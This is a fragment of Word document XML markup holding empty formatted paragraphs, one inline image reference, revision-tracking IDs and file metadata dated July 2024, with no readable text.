          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4308813B" w14:textId="672AEC62" w:rsidR="003675ED" w:rsidRDefault="008415BC">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="74BB5300" wp14:editId="3CF22A05">
            <wp:extent cx="4762500" cy="469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4762500" cy="469900"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA09073" w14:textId="20D27E0C" w:rsidR="00740BAA" w:rsidRDefault="00740BAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="463A45FC" w14:textId="77777777" w:rsidR="00740BAA" w:rsidRDefault="00740BAA">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="32305389" w14:textId="77777777" w:rsidR="008E7A59" w:rsidRDefault="008E7A59">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DBDAE03" w14:textId="70C9AE20" w:rsidR="00B5254D" w:rsidRDefault="00B5254D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0429F2B2" w14:textId="77777777" w:rsidR="00B5254D" w:rsidRPr="00B5254D" w:rsidRDefault="00B5254D">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:sectPr w:rsidR="00B5254D" w:rsidRPr="00B5254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2125"/>
    <w:rsid w:val="0009051B"/>
    <w:rsid w:val="000B0270"/>
    <w:rsid w:val="00117495"/>
    <w:rsid w:val="0012003F"/>
    <w:rsid w:val="002F49FE"/>
    <w:rsid w:val="002F5131"/>
    <w:rsid w:val="0030000D"/>
    <w:rsid w:val="003675ED"/>
    <w:rsid w:val="00367950"/>
    <w:rsid w:val="00383A3E"/>
    <w:rsid w:val="003F1BA7"/>
    <w:rsid w:val="003F3685"/>
    <w:rsid w:val="004005AA"/>
    <w:rsid w:val="004D333F"/>
    <w:rsid w:val="005835A5"/>
    <w:rsid w:val="00593684"/>
    <w:rsid w:val="00620F9B"/>
    <w:rsid w:val="00637730"/>
    <w:rsid w:val="006529ED"/>
    <w:rsid w:val="006645A7"/>
    <w:rsid w:val="0071467C"/>
    <w:rsid w:val="00740BAA"/>
    <w:rsid w:val="0082195B"/>
    <w:rsid w:val="008415BC"/>
    <w:rsid w:val="008B4B83"/>
    <w:rsid w:val="008E7A59"/>
    <w:rsid w:val="00901E88"/>
    <w:rsid w:val="009129C7"/>
    <w:rsid w:val="009667ED"/>
    <w:rsid w:val="009671C2"/>
    <w:rsid w:val="009E495B"/>
    <w:rsid w:val="00A40CA0"/>
    <w:rsid w:val="00A932FD"/>
    <w:rsid w:val="00AA49E0"/>
    <w:rsid w:val="00B5254D"/>
    <w:rsid w:val="00B55264"/>
    <w:rsid w:val="00B82B3C"/>
    <w:rsid w:val="00BB51CD"/>
    <w:rsid w:val="00BC51F2"/>
    <w:rsid w:val="00BD107F"/>
    <w:rsid w:val="00BF5C4C"/>
    <w:rsid w:val="00BF607E"/>
    <w:rsid w:val="00C22B12"/>
    <w:rsid w:val="00D92B01"/>
    <w:rsid w:val="00F37ECB"/>
    <w:rsid w:val="00F8212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4F0EB6E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0C091B83-15C1-E545-B7B6-E87EBE28D5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9</Pages>
  <Words>315</Words>
  <Characters>1801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38</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-07-09T13:50:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-07-10T10:57:00Z</dcterms:modified>
</cp:coreProperties>
</file>